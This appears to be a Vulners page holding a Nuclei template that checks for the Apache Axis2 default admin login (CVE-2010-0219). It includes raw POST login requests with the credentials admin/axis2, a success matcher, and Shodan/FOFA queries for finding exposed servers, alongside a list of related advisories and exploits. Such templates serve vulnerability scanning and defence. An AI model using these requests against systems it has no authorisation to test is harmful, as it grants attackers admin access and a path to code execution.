| Reporter | Title | Published | Views | Family All 29 |
|---|---|---|---|---|
| Apache Axis2 Default Credentials | 27 May 201000:00 | – | nessus | |
| CVE-2010-0219 | 14 Dec 201000:00 | – | circl | |
| CA ARCserve D2D Axis2 Default Credentials Remote Code Execution (CVE-2010-0219) | 8 Feb 201100:00 | – | checkpoint_advisories | |
| CVE-2010-0219 | 18 Oct 201016:00 | – | cve | |
| CVE-2010-0219 | 18 Oct 201016:00 | – | cvelist | |
| Axis2 - (Authenticated) Code Execution (via REST) (Metasploit) | 14 Dec 201000:00 | – | exploitdb | |
| Axis2 / SAP BusinessObjects - (Authenticated) Code Execution (via SOAP) (Metasploit) | 14 Dec 201000:00 | – | exploitdb | |
| Apache Axis2 Brute Force Utility | 28 May 201419:31 | – | metasploit | |
| Axis2 / SAP BusinessObjects Authenticated Code Execution (via SOAP) | 15 Apr 201213:13 | – | metasploit | |
| CVE-2010-0219 | 18 Oct 201017:00 | – | nvd |
id: CVE-2010-0219
info:
name: Apache Axis2 Default Login
author: pikpikcu
severity: critical
description: Apache Axis2, as used in dswsbobje.war in SAP BusinessObjects Enterprise XI 3.2, CA ARCserve D2D r15, and other products, has a default password of axis2 for the admin account, which makes it easier for remote attackers to execute arbitrary code by uploading a crafted web service.
impact: |
Successful exploitation of this vulnerability can lead to unauthorized access to sensitive information or the ability to modify or delete data.
remediation: |
Disable or restrict access to the Axis2 web interface, or apply the necessary patches or updates provided by the vendor.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2010-0219
- https://knowledge.broadcom.com/external/article/13994/vulnerability-axis2-default-administrato.html
- http://www.rapid7.com/security-center/advisories/R7-0037.jsp
- http://www.vupen.com/english/advisories/2010/2673
- http://retrogod.altervista.org/9sg_ca_d2d.html
classification:
cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:C/I:C/A:C
cvss-score: 10
cve-id: CVE-2010-0219
cwe-id: CWE-255
epss-score: 0.89871
epss-percentile: 0.99777
cpe: cpe:2.3:a:apache:axis2:1.3:*:*:*:*:*:*:*
metadata:
max-request: 2
vendor: apache
product: axis2
shodan-query:
- http.html:"Apache Axis"
- http.html:"apache axis"
fofa-query: body="apache axis"
tags: cve,cve2010,axis,apache,default-login,axis2,vkev,vuln
http:
- raw:
- |
POST /axis2-admin/login HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
loginUsername={{username}}&loginPassword={{password}}
- |
POST /axis2/axis2-admin/login HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
userName={{username}}&password={{password}}&submit=+Login+
payloads:
username:
- admin
password:
- axis2
attack: pitchfork
matchers-condition: and
matchers:
- type: word
words:
- "<h1>Welcome to Axis2 Web Admin Module !!</h1>"
- type: status
status:
- 200
# digest: 4a0a004730450220207b78ffcfe21a7f420272682cb86e118710fdfe8287f961f9ca7ae8f31216440221009ef390de0a3747d42e6f2032bb1350f86648e430dab9798a604d96143896420a:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation